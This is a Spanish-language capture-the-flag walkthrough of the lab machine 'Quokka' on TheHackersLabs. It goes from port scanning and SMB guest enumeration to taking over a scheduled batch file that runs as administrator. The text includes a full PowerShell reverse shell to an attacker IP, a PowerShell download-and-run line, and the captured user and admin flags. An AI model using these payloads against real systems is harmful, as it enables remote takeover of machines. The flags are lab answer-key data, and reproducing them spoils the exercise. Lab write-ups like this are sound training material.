Quokka (Windows) TheHackersLabs (Principiante)

Escaneo de puertos

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>

nmap -sCV -p<PORTS> <IP>

Info:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-17 18:02 CET
Nmap scan report for 192.168.10.45
Host is up (0.00030s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Portfolio y Noticias Tech de Quokka
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
49683/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 08:00:27:98:E3:3C (Oracle VirtualBox virtual NIC)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -20m00s, deviation: 34m38s, median: 0s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:98:e3:3c (Oracle VirtualBox virtual NIC)
| smb-os-discovery:
|   OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
|   Computer name: WIN-VRU3GG3DPLJ
|   NetBIOS computer name: WIN-VRU3GG3DPLJ\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-03-17T18:03:10+01:00
| smb2-time:
|   date: 2025-03-17T17:03:10
|_  start_date: 2025-03-17T16:49:51

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.08 seconds

Vemos que tiene un puerto 80 en el que tiene alojada una pagina web, pero si investigamos no veremos mucho, tambien vemos que tiene un servidor SMB por lo que vamos a probar a enumerar usuario o recursos mediante la herramienta enum4linux.

enum4linux

enum4linux -a <IP>

Info:

Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Mar 17 18:06:23 2025

 =========================================( Target Information )=========================================

Target ........... 192.168.10.45
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.10.45 )===========================


[+] Got domain/workgroup name: WORKGROUP


 ===============================( Nbtstat Information for 192.168.10.45 )===============================

Looking up status of 192.168.10.45
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WIN-VRU3GG3DPLJ <00> -         B <ACTIVE>  Workstation Service
	WIN-VRU3GG3DPLJ <20> -         B <ACTIVE>  File Server Service

	MAC Address = 08-00-27-98-E3-3C

 ===================================( Session Check on 192.168.10.45 )===================================


[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

Vemos que no nos permite enumerarlo con el usuario vacio, por lo que haremos lo siguiente:

enum4linux -a -u guest -p "" <IP>

Con esto vamos a utilizar el usuario guest que suele ser el de por defecto para probar a enumerar el SMB.

Info:

Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Mar 17 18:06:49 2025

 =========================================( Target Information )=========================================

Target ........... 192.168.10.45
RID Range ........ 500-550,1000-1050
Username ......... 'guest'
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.10.45 )===========================


[+] Got domain/workgroup name: WORKGROUP


 ===============================( Nbtstat Information for 192.168.10.45 )===============================

Looking up status of 192.168.10.45
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WIN-VRU3GG3DPLJ <00> -         B <ACTIVE>  Workstation Service
	WIN-VRU3GG3DPLJ <20> -         B <ACTIVE>  File Server Service

	MAC Address = 08-00-27-98-E3-3C

 ===================================( Session Check on 192.168.10.45 )===================================


[+] Server 192.168.10.45 allows sessions using username 'guest', password ''


 ================================( Getting domain SID for 192.168.10.45 )================================

Bad SMB2 (sign_algo_id=1) signature for message
[0000] 00 00 00 00 00 00 00 00   00 00 00 00 00 00 00 00   ........ ........
[0000] EA 10 A7 37 B0 AA E4 DB   2D C1 66 1D 9E 81 71 9A   ...7.... -.f...q.
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

[+] Can't determine if host is part of domain or part of a workgroup


 ==================================( OS information on 192.168.10.45 )==================================


[E] Can't get OS info with smbclient


[+] Got OS info for 192.168.10.45 from srvinfo:
Bad SMB2 (sign_algo_id=1) signature for message
[0000] 00 00 00 00 00 00 00 00   00 00 00 00 00 00 00 00   ........ ........
[0000] FD 6C 0A 40 41 60 C9 57   51 B9 59 26 1F 9F 84 1E   .l.@A`.W Q.Y&....
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED


 =======================================( Users on 192.168.10.45 )=======================================


[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED



[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED


 =================================( Share Enumeration on 192.168.10.45 )=================================

do_connect: Connection to 192.168.10.45 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Admin remota
	C$              Disk      Recurso predeterminado
	Compartido      Disk
	IPC$            IPC       IPC remota
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.10.45

//192.168.10.45/ADMIN$	Mapping: DENIED Listing: N/A Writing: N/A
//192.168.10.45/C$	Mapping: DENIED Listing: N/A Writing: N/A
//192.168.10.45/Compartido	Mapping: OK Listing: OK Writing: N/A

[E] Can't understand response:

NT_STATUS_NO_SUCH_FILE listing \*
//192.168.10.45/IPC$	Mapping: N/A Listing: N/A Writing: N/A

 ===========================( Password Policy Information for 192.168.10.45 )===========================


[E] Unexpected error from polenum:



[+] Attaching to 192.168.10.45 using guest

[+] Trying protocol 139/SMB...

	[!] Protocol failed: Cannot request session (Called Name:192.168.10.45)

[+] Trying protocol 445/SMB...

	[!] Protocol failed: rpc_s_access_denied



[E] Failed to get password policy with rpcclient



 ======================================( Groups on 192.168.10.45 )======================================


[+] Getting builtin groups:


[+]  Getting builtin group memberships:


[+]  Getting local groups:


[+]  Getting local group memberships:


[+]  Getting domain groups:


[+]  Getting domain group memberships:


 ==================( Users on 192.168.10.45 via RID cycling (RIDS: 500-550,1000-1050) )==================


[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.


 ===============================( Getting printer info for 192.168.10.45 )===============================

Bad SMB2 (sign_algo_id=1) signature for message
[0000] 00 00 00 00 00 00 00 00   00 00 00 00 00 00 00 00   ........ ........
[0000] 61 CC 24 BC 2C 5E C1 16   57 14 F3 22 83 3C C1 0E   a.$.,^.. W..".<..
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Mon Mar 17 18:06:53 2025

Vemos que esta vez si ha funcionado, podemos ver varias cosas interesantes sobre todo que el recurso compartido llamado Compartido se puede entrar y escribir, por lo que si intentamos entrar como anonimo veremos que nos deja.

Escalate Privileges

SMB

smbclient //<IP>/Compartido -N

Si listamos veremos lo siguiente:

.                                   D        0  Sun Oct 27 15:54:55 2024
  ..                                  D        0  Sun Oct 27 15:54:55 2024
  Documentación                      D        0  Sun Oct 27 15:33:53 2024
  Logs                                D        0  Sun Oct 27 15:33:54 2024
  Proyectos                           D        0  Sun Oct 27 15:33:54 2024

		7735807 blocks of size 4096. 4827906 blocks available

Si nos vamos a la siguiente estructura de carpetas:

dir Proyectos\Quokka\Código\

Veremos unos archivos interesantes:

.                                   D        0  Sun Oct 27 15:58:54 2024
  ..                                  D        0  Sun Oct 27 15:58:54 2024
  index.html                          A       52  Sun Oct 27 15:33:54 2024
  mantenimiento - copia.bat           A     1252  Sun Oct 27 15:41:43 2024
  mantenimiento.bat                   A      343  Sun Oct 27 15:58:54 2024
  README.md                           A       56  Sun Oct 27 15:33:54 2024

		7735807 blocks of size 4096. 4827906 blocks available

Si nos descargamos el archivo mantenimiento.bat y lo leemos por dentro veremos lo siguiente:

@echo off
:: Mantenimiento del sistema de copias de seguridad
:: Este script es ejecutado cada minuto

REM Pista: Tal vez haya algo m�s aqu�...

:: Reverse shell a Kali
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "iex(New-Object Net.WebClient).DownloadString('http://192.168.1.36:8000/shell.ps1')"

:: Fin del script
exit

Vemos que se esta ejecutando algun script en el puerto 8000 y en la IP: 192.168.1.36, pero no sabemos que hace ese script.

Si leemos el otro archivo llamado mantenimiento - copia.bat veremos lo siguiente:

@echo off
:: ------------------------------------------------------------------
:: Mantenimiento del sistema de copias de seguridad
:: Este script es ejecutado cada minuto para mover los archivos de logs
:: Nota: Asegúrate de no modificar este script sin permisos de administrador
:: ------------------------------------------------------------------

:: Pista: Este script se ejecuta con permisos elevados. Seguro que no hay nada más?

REM Mover los archivos de logs a la carpeta de respaldo
echo Moviendo archivos de logs...
move "C:\Logs\*.log" "C:\Backup\OldLogs\"

:: Pista oculta: Si tienes acceso a este script, podrás manipular su comportamiento.
:: Asegúrate de revisar las líneas de comando en detalle. Tal vez haya una forma de aprovechar esta ejecución

REM Verificar el estado del sistema
echo Verificando el estado del sistema...
systeminfo > nul

REM Comprobando si los archivos temporales necesitan limpieza
echo Limpiando archivos temporales...
del /q "C:\Temp\*.*"

REM Pista: Todo parece estar bajo control, pero realmente lo está?
REM Este script se ejecuta con permisos de administrador cada minuto. Tal vez haya algo útil aquí.

:: Fin del script
echo Operación completada.
exit

Vemos que esta cogiendo el shell.ps1 directamente desde cualquier IP por lo que vamos a crearnos un codigo para generar una reverse shell.

$client = New-Object System.Net.Sockets.TCPClient('<IP_ATTACKER>', 4444)
$stream = $client.GetStream()
[byte[]]$buffer = 0..255|%{0}
while(($i = $stream.Read($buffer, 0, $buffer.Length)) -ne 0)
{
    $data = (New-Object Text.ASCIIEncoding).GetString($buffer, 0, $i)
    $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String)
    $sendback2 = $sendback + "PS " + (pwd).Path + "> "
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte, 0, $sendbyte.Length)
    $stream.Flush()
}
$client.Close()

Ahora vamos a modificar el mantenimiento.bat y dejarlo de la siguiente forma:

@echo off
:: Mantenimiento del sistema de copias de seguridad
:: Este script es ejecutado cada minuto

REM Pista: Tal vez haya algo m�s aqu�...

:: Reverse shell a Kali
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "iex(New-Object Net.WebClient).DownloadString('http://<IP_ATTACKER>:8000/shell.ps1')"

:: Fin del script
exit

Esto lo subiremos al SMB de la siguiente forma:

cd Proyectos/Quokka/Código
put mantenimiento.bat

Ahora vamos abrirnos un servidor de python3 para que nos coja el archivo shell.ps1 y seguidamente nos pondremos a la escucha con nc.

python3 -m http.server 8000

Ahora nos pondremos a la escucha:

nc -lvnp <IP> 4444

Solo tendremos que esperar cosa de 1 minuto y si volvemos a donde tenemos la escucha veremos lo siguiente:

listening on [any] 4444 ...
connect to [192.168.10.47] from (UNKNOWN) [192.168.10.45] 49794
whoami
win-vru3gg3dplj\administrador
PS C:\Windows\system32>

Vemos que funciono y seremos el usuario el administrador directamente, por lo que leeremos la flag del admin y del usuario (0mar).

user.txt

9OWiub9aDwcULNxs4w80W63Jl

admin.txt

j9eCpd89VGOscar4nQp8e842mUOb8U